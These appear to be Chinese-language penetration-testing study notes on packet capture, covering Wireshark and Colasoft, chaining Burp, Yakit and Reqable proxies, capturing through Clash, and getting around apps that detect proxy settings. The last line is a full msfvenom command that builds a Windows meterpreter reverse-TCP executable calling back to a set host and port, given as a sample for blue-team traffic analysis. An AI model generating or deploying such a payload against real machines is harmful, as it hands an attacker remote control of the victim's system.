目录
一、抓包技术-Web&App&小程序&PC-扶墙双层
Wireshark:
网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。
科来网络分析系统:
该系统具有行业领先的专家分析技术,通过捕获并分析网络中传输的底层数据包,对网络故障、网络安全以及网络性能进行全面分析,从而快速排查网络中出现或潜在的故障、安全及性能问题。
二、 抓包技术-Web&App&小程序&PC-项目联动
#抓包工具联动
意义:让一个数据包同时经过不同安全测试工具进行扫描
Burp->Yakit
1、Burp 127.0.0.1:8080
2、Yakit 127.0.0.1:8083
3、让Burp将给到Yakit
4、系统的代理设置:127.0.0.1:8080
Yakit->Burp
1、Yakit 127.0.0.1:8083
2、设置下游 127.0.0.1:8080
3、Burp 127.0.0.1:8080
4、系统的代理设置:127.0.0.1:8083
Burp->Yakit->Reqable
1、Burp 127.0.0.1:8080
2、Yakit 127.0.0.1:8083
3、让Burp将给到Yakit
4、系统的代理设置:127.0.0.1:8080
5、Yakit设置下游 127.0.0.1:9000
三、抓包技术-Web&App&小程序&PC-全局协议
#科学上网抓包
Clash+Burp Clash+Yakit
解决:
1、目标需要采用梯子才能访问
2、IP隐藏去访问并要进行抓包
#全局协议抓包
WireShark 科来网络系统
1、解决部分代理校验
有部分的app web 小程序 当设置了代理后无法抓包
校验:检测到了当前机器的代理设置 做了一个策略防止
做了代理的设置数据走向:本身应用-代理-还没有到网卡-给到监听抓包工具
没有做代理的数据走向:本身应用-服务器(网卡抓包) 代理是在网卡之前产生
2、APP/小程序/PC应用
由于应用类型不同,不是说所有的应用都有https协议的数据
3、蓝队分析TCP/UDP应用
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.9 lport=6666 -f exe -o 9.exe